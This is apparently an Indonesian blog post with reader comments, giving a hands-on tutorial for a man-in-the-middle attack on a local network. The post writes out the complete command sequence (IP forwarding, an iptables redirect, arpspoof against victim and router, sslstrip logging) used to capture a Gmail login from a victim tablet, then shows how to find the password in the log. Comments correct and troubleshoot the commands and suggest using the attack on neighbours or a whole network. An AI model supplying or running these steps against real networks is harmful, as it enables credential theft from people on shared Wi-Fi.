Halo Blogger.
Untuk hari ini saya memiliki contoh kecil tentang betapa berbahayanya terhubung ke jaringan tidak aman yang disukai oleh banyak dari kita.
Untuk hari ini, saya akan menggunakan ArpSpoofing dengan Sslstrip untuk mendapatkan kata sandi Gmail. Untuk membuat lingkungan lebih terkontrol, saya telah membuat akun bernama "testarp@gmail.com".
Dan karena saya tidak terlalu suka pembukaannya, mari kita mulai bisnis.
LINGKUNGAN HIDUP
Untuk tes ini apa yang kami miliki adalah sebagai berikut:
1. Penyerang: Ini adalah komputer desktop atau desktop saya yang memiliki Debian Wheezy. Dari repositori Anda dapat menginstal sslstrip.dll y mengendus untuk mendapatkan harpspoofing
2. Korban: Korbannya adalah Tablet Android yang hanya ingin melihat emailnya melalui browser.
3. Media: Bagian tengah adalah milikku Cisco DPC2425 Router
ALAMAT.
Alamat penyerang: 172.26.0.2
Alamat Router: 172.26.0.1
Alamat Korban: 172.26.0.8
SERANGAN ITU:
Hal pertama yang akan kita lakukan untuk serangan ini adalah mengaktifkan penerusan sehingga komputer kita dapat meneruskan informasi kepada korban tanpa mereka sadari. (Jika tidak, itu akan menjadi serangan penolakan layanan)
Untuk itu kami akan menggunakan:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Sekarang jika kita melakukan tail -f desdelinux kami melihat informasi secara langsung dan langsung
Jadi bagaimana kita mendapatkan apa yang kita inginkan?
Pertama-tama mari kita masukkan email kita di Tablet. Saat masuk, kami melihat ribuan dan ribuan hal muncul di konsol kami.
Sekarang sudah selesai mari kita buka file kita “desdelinux” dengan nano
nano desdelinux
dengan Control + W kami mencari sesuatu yang disebut SECURE POST.
Dan kita akan melihat sesuatu seperti ini.
Di antara garis besar yang tidak bisa dilihat adalah email dan kata sandi korban.
Jadi kami lari ke kanan sampai akhirnya kami melihat cahaya di ujung terowongan.
Pada kesempatan lain kita akan melihat bagaimana kita bisa sedikit melindungi diri kita sendiri dari serangan ini.
salam
Saya mengambil kesempatan ini untuk mengatakan bahwa ketika posting diterbitkan, perintahnya tidak benar.
Perintah iptables di akhir kehilangan 8080 yang ada di baris lain. Dan kemudian perintah arpspoof berada di baris yang sama. Setiap perintah berada di baris yang berbeda.
Semoga editor melihatnya dan bisa memperbaikinya.
Salam.
Saya telah membuat koreksi yang Anda sebutkan, apakah tidak apa-apa?
Jika Anda akan menyisipkan kode di entri yang disukai, gunakan tampilan HTML, dan verifikasi bahwa artikel tersebut benar sebelum mengirimkannya ke tertunda. Terima kasih.
Sungguh mengerikan mengetahui bahwa kita yang tidak memiliki pengetahuan sangat rentan. Informasi yang sangat baik bahkan ketika saya memahami sedikit tentang subjek, saya menyadari pentingnya. Terima kasih!
salam
Tapi itu hanya berfungsi jika penyerang dan korban berada di jaringan yang sama. Bagaimanapun, menurut saya jika (berada di jaringan yang sama) Anda terhubung menggunakan HTTPS itu tidak terjadi karena data dienkripsi SEBELUM meninggalkan mesin Anda. Jika Anda terhubung dengan HTTP (tanpa S) saya pikir bahkan melihat kabel jaringan Anda melihat kuncinya.
Itu tidak benar. Saya meretas kata sandi gmail dan jika Anda melihat gmail menggunakan https. Begitu? Intinya adalah bahwa meskipun https aman, itu bergantung pada http. Jadi tidak begitu aman.
Jangan terlalu banyak mengakui tentang https bahwa S bukan untuk Superman, itu untuk "aman"
ini bekerja dengan atau tanpa https, saya telah mencobanya dengan distro linux yang lebih khusus dan bekerja tanpa masalah
Anda dapat menggunakannya dengan tepat untuk mengajari mereka yang mencuri Wi-Fi Anda pelajaran. 😀
Kurang lebih seperti yang mereka katakan di masa lalu di blog Chema Alonso:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, hebat sekali! / Dan kemudian mereka mengatakan paranoid saya setiap kali saya menggunakan VPN ketika mereka pergi untuk memeriksa rekening bank…). Ngomong-ngomong, Anda harus melihat betapa sinisnya orang-orang di komentar ... jika pada akhirnya itu mencuri ...
Sekarang kita perlu mengambil tutorial tentang cara membuat dan menawarkan layanan VPN Anda sendiri.
Cerita yang Anda tautkan sangat menarik, bahkan tampaknya layak untuk sebuah buku novel, dan ini membuat saya ingat ketika saya menggunakan internet tetangga saya dan meskipun saya mengatakan saya tahu subjeknya, saya pikir saya tidak akan pernah bisa melihat dimensi sebenarnya dari bahaya yang bisa saya miliki bertahan, untung bagi saya, mereka hanya mengubah kata sandi menjadi WPA2 dan dari situlah cerita saya dengan ISP dimulai haha
Itulah mengapa judulnya mengatakan Sslstrip beraksi.
Ini berhasil, selama penyerang ada di tengah
Gelombang apa yang Anda kerjakan di prisma? -.-
tidak.
Apa yang Anda tunggu untuk mengirim permintaan Anda XD
salam
posting yang baik
Menarik, saya akan melakukan tes pendidikan nanti ... Mungkin saya bahkan bisa menghapus kata sandi ke WiFi dan bersenang-senang sebentar 😛
Kebetulan, dapatkah Anda melakukan sesuatu yang serupa untuk mengirim halaman berbeda ke halaman yang diminta target? Misalnya, mereka ingin membuka Facebook dan saya mengalihkannya ke Google? 😛
Iya. Tapi itu semua sangat berbeda.
Mungkin saya akan mempostingnya nanti.
posting yang sangat bagus, topik ini sangat mendidik, sekarang kita harus dapat melawan serangan ini, karena beberapa (seperti saya) terhubung ke jaringan publik (universitas misalnya) akan sangat membantu untuk menghindarinya.
Salam!
Itu tidak berhasil untuk saya 🙁
Sesuatu membuat saya gagal di sini, terlepas dari fakta bahwa koneksi https dienkripsi melalui sertifikat server (setelah Anda memiliki sertifikat di mesin Anda, browser Anda bertanggung jawab atas enkripsi) dengan iptables Anda mengalihkan port 80 (http) , bukan 443, yang merupakan https
Saya juga berpikir begitu. Intinya adalah bahwa meskipun https "aman", sayangnya hal itu bergantung pada http. Jadi sslstrip memanfaatkannya, itu membuat browser percaya bahwa ia menggunakan kredensial https tetapi sebenarnya tidak.
Sialan! tetapi browser akan melihat peringatan seperti "sertifikat ini berasal dari situs yang mencurigakan atau semacamnya" ... Saya pasti harus melakukan tes XD
Tidak, sama sekali tidak ada yang keluar.
Itu akhirnya berhasil untuk saya
Saya terhubung pada jaringan WEP dengan kata sandi, dan itu menunjukkan kata sandi secara langsung.
Sebuah pertanyaan. Dapatkah Anda melakukan prosedur yang sama ini tetapi untuk semua komputer yang terhubung dalam jaringan, alih-alih memiliki satu korban?
Ya kamu bisa. Tapi saya belum melakukan eksperimen. Cobalah sendiri dan beri tahu kami bagaimana kelanjutannya.
Satu-satunya hal yang saya dapatkan dengan ini adalah bahwa mesin korban mati, tetapi sslstrip tidak menunjukkan apa pun kepada saya: /
Anda harus menonaktifkan firewall sebentar. Atau setidaknya aktifkan koneksi masuk.
Probe dan saya hanya bisa melihat username dan password halaman facebook, di gmail saya tidak menemukan hasil apapun di log, juga saya hanya membutuhkan baris arpspoof «arpspoof -i -t«. Di sisi lain, mesin korban tidak dapat membuka beberapa halaman. Saya akan terus menyelidiki, ini sangat menarik. Bantuan bagi mereka yang menggunakan Manjaro, paket yang akan diinstal adalah: dsniff (ini arpspoff), twisted dan python2-pyopenssl. Sslstrip dapat diunduh dari sini: http://www.thoughtcrime.org/software/sslstrip/
Untuk menjalankannya $ python2 sslstrip.py
Salam.
Itu tidak keluar tetapi baris arpspoof adalah: #arpspoof -i int -t ip-korban ip-router
lihat saya melakukan apa yang Anda katakan:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
Masalahnya adalah bahwa korban adalah pc lain yang saya miliki di sini di kamar saya, saya tidak memiliki koneksi sampai saya harus me-restart router, apa yang bisa saya bantu.
Hal lain saya bekerja dengan mesin virtual, dan ketika saya menjalankan perintah iwconfig, wlan0 tidak muncul, atau ketika saya menjalankan ifconfig, namun, jika saya memiliki internet di mesin virtual saya, dengan antarmuka eth0.